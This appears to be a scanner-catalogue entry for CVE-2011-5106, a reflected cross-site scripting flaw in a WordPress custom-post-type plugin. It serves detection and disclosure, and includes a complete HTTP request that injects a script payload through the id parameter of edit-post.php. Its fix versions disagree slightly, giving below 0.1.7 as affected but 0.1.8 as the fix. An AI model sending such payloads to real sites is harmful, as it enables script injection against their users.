| Title | WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. |
| Remediation | Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. |
| CVSS Score | 4.3 |
| EPSS Score | 0.02815 |
| CVE ID | CVE-2011-5106 |
| CWE ID | CWE-79 |
| Tags | cve cve2011 wordpress xss wp-plugin fractalia vuln |
A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-5106.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-5106.pcap
N/AN/A